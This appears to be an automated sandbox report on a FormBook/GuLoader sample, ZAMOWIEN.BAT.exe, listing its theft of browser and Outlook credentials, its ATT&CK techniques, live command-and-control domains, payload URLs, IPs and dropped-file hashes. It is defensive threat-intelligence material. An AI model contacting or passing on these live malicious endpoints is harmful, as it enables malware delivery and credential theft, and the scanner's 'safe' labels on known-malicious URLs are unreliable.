Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\sdchange.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2457299942.0000000035D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2885603414.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	221 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	312 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Abuse Elevation Control Mechanism	1 Access Token Manipulation	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	312 Process Injection	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	23 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ZAMOWIEN.BAT.exe	13%	ReversingLabs
ZAMOWIEN.BAT.exe	18%	Virustotal		Browse
ZAMOWIEN.BAT.exe	100%	Avira	HEUR/AGEN.1337977

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nssF88.tmp\LangDLL.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
www.officinadelpasso.shop	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.vayui.top/4twy/	0%	Avira URL Cloud	safe
http://ectasia.sa.com/po.binca	0%	Avira URL Cloud	safe
http://ectasia.sa.com/po.binL	0%	Avira URL Cloud	safe
http://ectasia.sa.com/po.bin	0%	Avira URL Cloud	safe
http://www.officinadelpasso.shop/vlg0/?WPjx20M=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&bxJPx=a6h4-FrPGbkpc	0%	Avira URL Cloud	safe
http://www.vayui.top	0%	Avira URL Cloud	safe
http://www.vayui.top/4twy/?WPjx20M=mBCElVLkK93E7Nf+SfzPyEy2pe/+ELSSyRrruRXkg+zqtIWho1c/UIFICRtgbVPxo7eZFunASSkRDpjuJtL+SqF6mTOIbDVEeaMEgz/yh1+O2PfmmYS3a3E=&bxJPx=a6h4-FrPGbkpc	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ectasia.sa.com	103.83.194.50	true	false		unknown
www.vayui.top	172.67.145.234	true	false		high
officinadelpasso.shop	195.110.124.133	true	true		unknown
www.tals.xyz	13.248.169.48	true	false		high
www.officinadelpasso.shop	unknown	unknown	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.vayui.top/4twy/	true	Avira URL Cloud: safe	unknown
http://www.officinadelpasso.shop/vlg0/?WPjx20M=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&bxJPx=a6h4-FrPGbkpc	true	Avira URL Cloud: safe	unknown
http://ectasia.sa.com/po.bin	false	Avira URL Cloud: safe	unknown
http://www.vayui.top/4twy/?WPjx20M=mBCElVLkK93E7Nf+SfzPyEy2pe/+ELSSyRrruRXkg+zqtIWho1c/UIFICRtgbVPxo7eZFunASSkRDpjuJtL+SqF6mTOIbDVEeaMEgz/yh1+O2PfmmYS3a3E=&bxJPx=a6h4-FrPGbkpc	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	false		high
https://duckduckgo.com/ac/?q=	sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ectasia.sa.com/po.binca	ZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002859000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	false		high
http://ectasia.sa.com/po.binL	ZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002848000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	ZAMOWIEN.BAT.exe	false		high
https://www.ecosia.org/newtab/	sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.vayui.top	iIQnSvahHYwDQ.exe, 00000008.00000002.2885196470.00000000009AD000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
195.110.124.133	officinadelpasso.shop	Italy	39729	REGISTER-ASIT	true
172.67.145.234	www.vayui.top	United States	13335	CLOUDFLARENETUS	false
103.83.194.50	ectasia.sa.com	United States	132335	NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1566409
Start date and time:	2024-12-02 07:08:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ZAMOWIEN.BAT.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/12@4/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 74% Number of executed functions: 80 Number of non-executed functions: 295
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:10:48	API Interceptor	6x Sleep call for process: sdchange.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
195.110.124.133	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.officinadelpasso.shop/te2d/
	Certificate 11-21AIS.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	Certificate 1045-20-11.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	Certificate 719A1120-2024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	Certificate 64411-18.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	Certificate 11-142024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	rDocument11-142024.exe	Get hash	malicious	FormBook	Browse	www.elettrosistemista.zip/fo8o/
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.nutrigenfit.online/2vhi/
172.67.145.234	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	www.vayui.top/vg0z/
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.vayui.top/4twy/
	purchase Order.exe	Get hash	malicious	FormBook	Browse	www.vayui.top/vg0z/
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.vayui.top/vg0z/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.vayui.top	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	104.21.95.160
	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	172.67.145.234
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.67.145.234
	S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.95.160
	purchase Order.exe	Get hash	malicious	FormBook	Browse	172.67.145.234
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	172.67.145.234
www.tals.xyz	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	13.248.169.48
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	CV Lic H&S Olivetti Renzo.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	Mandatory Notice for all December Leave and Vacation application.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	Quotation request -30112024_pdf.exe	Get hash	malicious	FormBook	Browse	13.248.169.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
REGISTER-ASIT	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Certificate 11-19AIS.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DO-COSU6387686280.pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	195.110.124.133
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	195.110.124.133
	S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	195.110.124.133
	Certificate 11-21AIS.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Certificate 1045-20-11.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Certificate 719A1120-2024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	Certificate 11-18720.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	RvJVMsNLJI.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN	https://www.google.rs/url?q=902CHARtTPSJ3J3wDyycT&sa=t&esrc=uoVoZFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=HARlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/burakyaman.co.uk%2FNew%2FAuth%2FxLOTspdcp8PiM3iiATiEg23p/amJ1cm8xMEBlcS5lZHUuYXU	Get hash	malicious	Unknown	Browse	103.83.194.55
	PO_0001.vbs	Get hash	malicious	GuLoader	Browse	103.83.194.50
	ORDER AND CATALOG 01.bat	Get hash	malicious	GuLoader	Browse	103.83.194.50
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.83.194.50
	Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.83.194.50
	S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.83.194.50
	https://recociese.za.com/wpcones/excel.html	Get hash	malicious	Unknown	Browse	103.83.194.50
	LPC Scanned Docs-Copyright #U00a9GNP.CPL.dll	Get hash	malicious	AsyncRAT	Browse	103.83.194.50
	08cb9f0ed370a2daea9dc05fa08aedc2a10b1615.html	Get hash	malicious	Unknown	Browse	103.83.194.55
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	168.81.254.150
CLOUDFLARENETUS	file.exe	Get hash	malicious	Amadey, Discord Token Stealer, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	172.67.165.166
	sora.mips.elf	Get hash	malicious	Mirai	Browse	1.4.51.14
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	172.68.102.131
	file.exe	Get hash	malicious	LummaC	Browse	104.21.82.174
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	https://wixauth-processing.es/wp/vite-react-web.vercel.app.html	Get hash	malicious	Unknown	Browse	104.21.26.223
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	tyhkamwdmrg.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.165.166
	mtbkkesfthae.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	tyhkamwdmrg.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll	https://github.com/Ultimaker/Cura/releases/download/5.9.0/UltiMaker-Cura-5.9.0-win64-X64.exe	Get hash	malicious	Unknown	Browse
	RFQ_BDS636011.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	CERTIFICADO TITULARIDAD.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe	Get hash	malicious	GuLoader	Browse
	SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe	Get hash	malicious	GuLoader	Browse
	D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse
	D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe	Get hash	malicious	GuLoader	Browse
	UMOWA_PD.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse
	UMOWA_PD.BAT.exe	Get hash	malicious	GuLoader	Browse
C:\Users\user\AppData\Local\Temp\nssF88.tmp\LangDLL.dll	LisectAVT_2403002A_176.exe	Get hash	malicious	ALLLQ	Browse
	kJs0JTLO6I.exe	Get hash	malicious	Metasploit	Browse
	kJs0JTLO6I.exe	Get hash	malicious	Metasploit	Browse
	https://www.dropbox.com/scl/fi/2u0ns17aqf2nkkout3i4e/Wion-Setup.exe?rlkey=bczprnlv9lpsjsrcm2mwnqhrh&st=tkdq1g8n&dl=1	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\k8457414

Download File

Process:	C:\Windows\SysWOW64\sdchange.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nssF88.tmp\LangDLL.dll

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.81833601044378
Encrypted:	false
SSDEEP:	48:S46+/pTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8m/ofjLl:zbuPbO5tCZBVEAWyMEFv2CmCL
MD5:	50016010FB0D8DB2BC4CD258CEB43BE5
SHA1:	44BA95EE12E69DA72478CF358C93533A9C7A01DC
SHA-256:	32230128C18574C1E860DFE4B17FE0334F685740E27BC182E0D525A8948C9C2E
SHA-512:	ED4CF49F756FBF673449DCA20E63DCE6D3A612B61F294EFC9C3CCEBEFFA6A1372667932468816D3A7AFDB7E5A652760689D8C6D3F331CEDEE7247404C879A233
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: LisectAVT_2403002A_176.exe, Detection: malicious, Browse Filename: kJs0JTLO6I.exe, Detection: malicious, Browse Filename: kJs0JTLO6I.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................>..........:..........Rich..........................PE..L...P.d...........!........."......?........ ...............................p............@.........................`"..I...\ ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...`....P......................@..@.reloc..`....`......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nssF88.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.805604762622714
Encrypted:	false
SSDEEP:	192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
MD5:	4ADD245D4BA34B04F213409BFE504C07
SHA1:	EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
SHA-256:	9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
SHA-512:	1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: RFQ_BDS636011.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: CERTIFICADO TITULARIDAD.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Browse Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Browse Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nswC99.tmp

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	data
Category:	dropped
Size (bytes):	2023060
Entropy (8bit):	2.8707432914746587
Encrypted:	false
SSDEEP:	12288:XRtsqp2B3QHMw8e84uDE4nGIV2sT31tzU7g7:h7pG3Qsw8hAolVjT3bzU
MD5:	96DE77AFF89167B8ED632B364AE89C49
SHA1:	4E4F9C6A2E8A58B4C154558F5F987C8C913AD1F3
SHA-256:	4F1F1DC637586C1436D3FBE4F68782877C9605CD15F7DEA8E371CC2FB346BBDA
SHA-512:	3E4AC6B66A3A9475A551C762468F2ED8A96B0EA26D6CE8F6431B233B885FB39C42B9B45129873D3E1A4A57D991BFE7A0FA6D20C6AA416056E2FFE842AF644E08
Malicious:	false
Preview:	\|>......,........................(......B=.......>..........................................................................................................................................................................................................................................G...V...............j...............................................................................................................................f.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\Circularness147.iag

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	data
Category:	dropped
Size (bytes):	362934
Entropy (8bit):	1.2454348476953587
Encrypted:	false
SSDEEP:	768:ycdABD0ui2x4w5RSUVuhHBpnARDNxTG5QFcIQSFltdbluQU3xxFrcZ3xgPcWIQXP:rhSpHtlMFAG5jJLxd7N1WB0
MD5:	DB3628EBC4FD59D2D008E98CA4A9B29F
SHA1:	51E6D1D34D233BC35E31F5844E892DE321F7A2D4
SHA-256:	05CFF76B558EF185BE6EB826C28A5883E2D9E0D5FA6512885C7328BDA3E22399
SHA-512:	E908E28BEDF535231E23F5FD8CE9F108C118C5906AFD5AD41FD58F504F77E2A4446BC977FB5E979258E0C2C5CF40F0E68D8766EF8E6FD75FDD21A8B0623BC2CF
Malicious:	false
Preview:	......... ..............i....4.....................................................................9...A....................].................5.........................W......?.............7.'.............................................................................-v.........................3..............................T.ZE..........Z..................................J.....?............................................l...........f..........................................................3.............Q..................,.................................................................................n......................b..m...........X............L........................................................................................................6.........................................,.........p..........>.......................................................................3.....U.............L.................hc.................................................7...;..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\Isobronton.son

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	95608
Entropy (8bit):	2.6652570207119863
Encrypted:	false
SSDEEP:	1536:mX5LCdCtvYhSizfSOmbjCjgYwpMjtrTTq5GALzIyBKov6:lYKm42S
MD5:	404B2620A2BE987A9C6E7E2A018B60A0
SHA1:	A25302626B3F14A2AE3C5FDCF5CDD1D744A2E923
SHA-256:	287C24407AD0846E71591F87F56B83C11FF3F929166D520F33F7BCF132928818
SHA-512:	E7FFF12F2F8E6435026A715E0E88B279D79002929985EF04542DE6E3DCA43430706CB14531124C72E5D00EF0572B57E4AD109FA2A4C3D1E5FBF088EFC9D85BA9
Malicious:	false
Preview:	0000000053535353008D8D000A0A000000D4D400DE00590000AEAEAEAEAE0000EB0000000070000010101000000000050500F800000058007171717171717171710000DC0000008E00E8E80018181800002B2B002F0000000000000800CD0000004300FC0000000000000707000000000000000000AF008A8A0000C2C2C2C20000CD006500007A0087007A7A7A7A000000BC0000910000006C000089006F00000000006C000000F100E0000000000000560000C4008100008300000000000056000000D500007900002C2C00B800000000007B7B7B00727200630000000000000000F7F7F7F7F7F70050006500002E0000616100060600B000535353006363636363630050500000050000AFAFAFAFAF0000E600000808007C7C7C00B5B5000000005C008A0019001500007000CD00008400000000BFBFBF00151500A30089005F00E6E600C6000000140000D900560000000000000000000000979700970000006B6B6B00CBCB00008C001C1C00CF0037001C006C00001A1A003200BCBC0033000800BC0000000079790036000000005D5D5D5D0000005151510000006E000000CFCFCF0000999999999999005757001F00000080008200101010000083007500AF004747000000000071710000E100F300540054545400F8F800DCDC008C8C00005B0026000000009E9E00004F4F4F00000089

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Tetranychus\tossehovederne\Applewoman\Neurofysiolog.kno

Download File

Process:	C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
File Type:	data
Category:	dropped
Size (bytes):	345752
Entropy (8bit):	1.2485863776845234
Encrypted:	false
SSDEEP:	1536:vklaVZbQysuTeVS30KMAkX5VaoQc7HtuIX:iYmyqVo0KMrpVaoV7HIIX
MD5:	4518342768EDDEFC68AA5BB19661821E
SHA1:	B80B20B6C069D5B8E5CC45CF6232A77CF278CD8F
SHA-256:	6A358F5EA31BC74F3745B51CA4D326841B7A0918DC7FDEFE908C7FDCD418B6B3
